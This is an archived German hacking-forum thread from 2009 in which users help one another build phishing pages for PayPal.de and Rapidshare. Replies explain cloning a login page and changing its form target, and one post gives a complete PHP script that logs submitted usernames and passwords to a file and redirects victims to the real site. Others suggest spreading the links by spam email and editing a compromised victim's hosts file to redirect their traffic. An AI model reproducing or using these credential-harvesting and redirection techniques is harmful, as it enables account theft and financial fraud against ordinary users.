PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [S] Phishin Site für Paypal.de und rapidshare.com



timo19t
29.01.2009, 10:34
Moin,
wie schon im Titel steht suche ich die 2 Phishingsites, es gibt zwar schon viele von dene aber die gehen nichtmehr. Bzw. bei rapidshare ist das design anders. Es wäre nett wenn einer mir die neusten phishingfiles von den 2 seiten geben könnte die auch funkionieren. Danke schonmal im voraus.

MFG timo

Hu5eL
29.01.2009, 10:52
geht auf rapidshare .com und machst Datei -> Seite speichern unter...
schwups noch das form umgeändert und du hast ne phising page, kannst bei paypal genaso machen

otto
29.01.2009, 10:55
Abgesehn davon,
das es phising packs (sehr viele) gibt,
wo auch rapidshare,paypal und viiiiiele mehr enthalten sind...

// ~> SuFu, hilft auch weiter ^^

timo19t
29.01.2009, 18:55
was genau muss ich an der form noch ändern

RaZz0r
29.01.2009, 19:13
Hier ist das für Paypal und es wird auch gesagt wie das vo Hu5el geht^^

http://free-hack.com/showthread.php?t=30359

Mfg

Junkycool
19.02.2009, 16:42
ich frage mich nur wo man den paypal.de Link rumverteilen kann ?
Tauschbörsen gibt ja keiner sein paypal Konto an ?
Kennt da jemand ein Trick ?


lg

KleverKing
19.02.2009, 16:56
Kann man nicht irgendwie wenn man z.B. einen seiner Server aufm PC eines anderen hat immer wenn er auf PayPal geht die Seite weiterleiten auf die Phishing Seite also er gibt bei sich PayPal ein und wird sofort (dank irgendwelcher Einstellungen die ich vorgenommen habe) weitergeleitet auf die Phishing Seite

fred777
19.02.2009, 17:10
Per Mailspamming natürlich, Für Warezseiten ist eher RS oder Uploaded gedacht ;)

bLaCk.LiGhT
19.02.2009, 18:57
Kann man nicht irgendwie wenn man z.B. einen seiner Server aufm PC eines anderen hat immer wenn er auf PayPal geht die Seite weiterleiten auf die Phishing Seite also er gibt bei sich PayPal ein und wird sofort (dank irgendwelcher Einstellungen die ich vorgenommen habe) weitergeleitet auf die Phishing Seite

das kannst du mithilfe der "hosts-Datei" realisieren ;)

lad diese datei vom vic runter und verändere sie nach dem schema:

195.122.131.18 http://deinhoster.de/rs.htmldie IP oben ist die IP von Rapidshare, rechts kommt die URL hin,
wohin du umleiten willst ;)

Cheese
19.02.2009, 19:10
was genau muss ich an der form noch ändern

so sieht es z.B. vorher aus.

<form method="post" action="WHATEVER/LOGIN.PHP?ACTION=LOGIN">
<input type="text" name="name" value="Name" maxlength="40" size="22" /><br />
<input type="password" name="password" value="Password" maxlength="40" size="22" /><br />
<input type="submit" name="login" value="Submit" />
</form>

du änderst im <form> tag die addresse bei action.
undzwar zu deinen script was die datein speichert welches du mit auf deinen space packst, nennen wir es 'get.php',
<form method="post" action="get.php">
die sieht so aus:

//get.php
<?php
$datei = fopen("logfile.txt","a+");
$name = $_POST['name']; // <- WICHTIG!
$pass = $_POST['password']; // <- WICHTIG!
fwrite($datei,"=====[".date("j-M-Y // H:i")."]=====\n");
fwrite($datei,"Username: $name \n");
fwrite($datei,"Password: $pass \n");
fclose($datei);
Header("Location: http://www.WHATEVER.com");
?>
an den stellen wo ich WICHTIG hingeschreiben hab musst du vorher das ['name'] und ['password'] damit ersetzen was in deiner form benutz wird.
<input type="text" name="name" value="Name" maxlength="40" size="22" />
<input type="password" name="password" value="Password" maxlength="40" size="22" />

die dinge die eingegeben wurden landen in der "logfile.txt" und man wird anschließend auf www.WHATEVER.com weitergeleitet (dann mit paypal ersetzen)




--------------------------------------------------------




Kann man nicht irgendwie wenn man z.B. einen seiner Server aufm PC eines anderen hat immer wenn er auf PayPal geht die Seite weiterleiten auf die Phishing Seite also er gibt bei sich PayPal ein und wird sofort (dank irgendwelcher Einstellungen die ich vorgenommen habe) weitergeleitet auf die Phishing Seite
genau wies bLaCk.LiGhT gesagt hat, in der hosts datei
die findeste bei windows in:
C:\WINDOWS\system32\drivers\etc\hosts
(bzw C:\WinXP\...... oder so, sollte klar sein)

L.ove
19.02.2009, 20:09
guck mal hier :http://free-hack.com/showthread.php?t=18062